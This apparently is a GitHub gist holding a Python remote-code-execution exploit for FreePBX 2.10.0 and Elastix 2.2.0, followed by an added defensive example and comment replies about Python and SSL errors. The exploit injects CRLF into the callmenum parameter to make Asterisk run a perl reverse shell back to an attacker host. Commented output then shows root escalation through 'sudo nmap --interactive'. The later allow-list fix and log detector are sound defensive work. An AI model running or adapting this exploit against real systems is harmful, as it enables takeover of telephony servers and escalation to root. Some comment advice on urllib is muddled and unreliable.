Created June 2, 2018 11:31
FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution - Fixed to avoid SSL errors.
```python
#!/usr/bin/python
############################################################
# Exploit Title: FreePBX / Elastix pre-authenticated remote code execution exploit
# Google Dork: oy vey
# Date: March 23rd, 2012
# Author: muts
# Version: FreePBX 2.10.0/ 2.9.0, Elastix 2.2.0, possibly others.
# Tested on: multiple
# CVE : notyet
# Blog post : http://www.offensive-security.com/vulndev/freepbx-exploit-phone-home/
# Archive Url : http://www.offensive-security.com/0day/freepbx_callmenum.py.txt
############################################################
# Discovered by Martin Tschirsich
# http://seclists.org/fulldisclosure/2012/Mar/234
# http://www.exploit-db.com/exploits/18649
#############################################################
import urllib2
import ssl

rhost = "172.16.254.72"   # target FreePBX / Elastix host
lhost = "172.16.254.223"  # attacker host the reverse shell connects back to
lport = 4443              # must match the port the netcat listener is bound to
extension = "1000"        # an existing extension, so callme_page.php accepts the request

# The appliance normally serves a self-signed certificate, so skip hostname and
# certificate verification (ssl.create_default_context needs Python 2.7.9+).
# This does not help if the target only offers SSLv3/TLS 1.0 and the local
# OpenSSL refuses them; that surfaces as [SSL: UNSUPPORTED_PROTOCOL].
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE

# Reverse shell payload: the CRLF sequences (%0D%0A) inside callmenum inject
# extra "Application: system" / "Data: perl ..." directives into the Asterisk
# call file that callme_page.php writes, so Asterisk executes the perl one-liner
# as the asterisk user.
url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'
urllib2.urlopen(url, context=ctx)

# On Elastix, once we have a shell, we can escalate to root:
# root@bt:~# nc -lvp 443
# listening on [any] 443 ...
# connect to [172.16.254.223] from voip [172.16.254.72] 43415
# id
# uid=100(asterisk) gid=101(asterisk)
# sudo nmap --interactive
# Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
# Welcome to Interactive Mode -- press h <enter> for help
# nmap> !sh
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
```
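The exploit above works because `callmenum` is URL-decoded and spliced into an Asterisk call file without being checked, so `%0D%0A` lets the client add its own `Application:` and `Data:` directives. The block below is an added example, not the gist's code and not FreePBX's code: it decodes the parameter the way the server would, shows which directives the injection contributes, applies the allow-list check that would have stopped it, and runs that same check over web access-log lines to flag attempts. `render_call_file()` is a simplified model of a page that concatenates the raw parameter into a call file (an assumption about the shape, not the real PHP), `EXTENSION_RE` is an assumed format for a legitimate extension, and the URL and log lines are constructed samples with a harmless `id` in place of the perl payload.

```python
"""Added example (not the gist's or FreePBX's code): model the callmenum
CRLF injection, reject it with an allow-list, and flag attempts in a web
access log.

Assumptions: render_call_file() is a simplified model of a page that
concatenates the raw parameter into a call file; EXTENSION_RE is an
assumed shape for a legitimate extension; the URL and log lines are
constructed samples with a harmless "id" command in place of the payload.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed: same shape as the exploit URL above, harmless Data value.
EXPLOIT_URL = (
    "https://172.16.254.72/recordings/misc/callme_page.php?action=c"
    "&callmenum=1000@from-internal/n%0D%0AApplication:%20system"
    "%0D%0AData:%20id%0D%0A%0D%0A"
)

# Directives a benign request produces in the model; anything else came
# from the parameter.
BASELINE_KEYS = {"Channel", "Context", "Extension"}

# Assumed allow-list for a legitimate callmenum: digits and dialpad symbols.
EXTENSION_RE = re.compile(r"[0-9*#+]{1,32}")


def callmenum_from_url(url):
    """Return the URL-decoded callmenum parameter ('' if absent)."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get("callmenum", [""])[0]


def render_call_file(callmenum):
    """Simplified model of the vulnerable pattern: the raw parameter is
    spliced into the Channel line and fixed directives follow."""
    return (
        "Channel: Local/" + callmenum + "\r\n"
        "Context: from-internal\r\n"
        "Extension: s\r\n"
    )


def parse_directives(call_file):
    """Split a call file into (key, value) pairs the way a 'Key: Value'
    line reader does; lines without a colon are skipped."""
    pairs = []
    for line in re.split(r"\r?\n", call_file):
        key, sep, value = line.partition(":")
        if sep and key.strip():
            pairs.append((key.strip(), value.strip()))
    return pairs


def injected_keys(callmenum):
    """Directive keys that exist only because of CR/LF in the parameter."""
    keys = [k for k, _ in parse_directives(render_call_file(callmenum))]
    return [k for k in keys if k not in BASELINE_KEYS]


def safe_extension(callmenum):
    """Hardened check: accept only a plain extension and reject everything
    else (any CR or LF included) before it can reach the call file."""
    if not EXTENSION_RE.fullmatch(callmenum):
        raise ValueError("callmenum rejected: %r" % callmenum)
    return callmenum


# Constructed Apache-style access-log samples: one benign call, one injection.
LOG_LINES = [
    '10.0.0.5 - - [23/Mar/2012:10:01:02 +0000] "GET /recordings/misc/'
    'callme_page.php?action=c&callmenum=1000 HTTP/1.1" 200 512',
    '10.0.0.9 - - [23/Mar/2012:10:01:07 +0000] "GET /recordings/misc/'
    'callme_page.php?action=c&callmenum=1000@from-internal/n%0D%0A'
    'Application:%20system%0D%0AData:%20id%0D%0A%0D%0A HTTP/1.1" 200 512',
    '10.0.0.5 - - [23/Mar/2012:10:02:00 +0000] "GET /index.php HTTP/1.1" 200 1024',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def suspicious_callme_clients(lines):
    """Client IPs whose callme_page.php request carried a callmenum that
    fails the allow-list; the decoded CRLF and 'Application:' land here."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match or "callme_page.php" not in match.group(1):
            continue
        if not EXTENSION_RE.fullmatch(callmenum_from_url(match.group(1))):
            hits.append(line.split()[0])
    return hits


if __name__ == "__main__":
    value = callmenum_from_url(EXPLOIT_URL)
    print("injected directives:", injected_keys(value))
    print("suspicious clients:", suspicious_callme_clients(LOG_LINES))
```

The detection reuses the same allow-list as the fix rather than searching for the string `Application`, so encoding tricks or a different injected directive still trip it; the trade-off is that any legitimate value outside the assumed extension format also gets flagged, so tune `EXTENSION_RE` to what the deployment actually dials.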
In the newer versions of Python, you have to replace line 32 to be: `urllib2.request.urlopen`
Thanks for the reply. But you're wrong. `urllib2.urlopen(url, context=ctx)` is correct. The `extension="1000"` is the problem here.
The legacy urllib.urlopen function from Python 2.6 and earlier has been discontinued; urllib.request.urlopen() corresponds to the old urllib2.urlopen. Proxy handling, which was done by passing a dictionary parameter to urllib.urlopen, can be obtained by using ProxyHandler objects.
It is still not working. Error: `urllib2.URLError: <urlopen error [SSL: UNSUPPORTED_PROTOCOL] unsupported protocol (_ssl.c:727)>`